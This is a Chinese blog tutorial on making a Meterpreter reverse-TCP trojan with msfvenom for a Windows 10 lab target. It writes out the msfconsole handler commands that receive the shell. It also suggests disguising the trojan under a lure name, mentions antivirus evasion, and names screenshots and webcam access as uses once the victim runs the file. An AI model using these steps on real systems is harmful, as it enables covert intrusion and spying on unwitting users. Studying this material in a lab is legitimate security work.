msfvenom的简单使用

下面简单的演示一下msfvenom的简单使用,

攻击者:kali Linux  ip:192.168.187.130

靶机:Windows10 

思路:利用msfvenom制作 .exe 文件,然后发送到靶机Windows上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机

1. 在kali Linux 上面启动一个终端 执行以下命令

msfvenom -l | grep windows | grep x64 | grep tcp

列出所有可以用的并在屏幕显示条目中有 Windows x64 tcp 的


payload在这里我们选择windows/x64/meterpreter/reverse_tcp

下面是使用msfvenom的部分参数,是比较常用的

-p 选择一个payload

-l 载荷列表

-f 生成的文件格式

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。

-h 帮助


在这里,我们生成一个test.exe的木马文件(文件在root文件夹下),控制端的ip为192.168.187.130,端口号为4444。然后利用这个木马传给靶机,可以改一改名字,比如 QQ坦白说查看器之类的,杀毒软件可能报毒,其实是需要免杀处理的,后面学了再说吧。


2. 利用msfconsole监听

启动msfconsole  漫长的等待..................................................


然后报错了,


然后查了一下,分配的内存不够

解决地址https://www.tr0y.wang/2018/10/08/LUinux/

这样解决有点慢,我有一个更暴力的,既然内存不足,我就把虚拟机分配给kali Linux的内存加到2G,OK问题解决


键入以下命令:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.187.130

set lport 4444

exploit


然后就可以等待了,当靶机点击了那个文件时


就可以开始你的表演了,比如截图,打开摄像头等等


最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容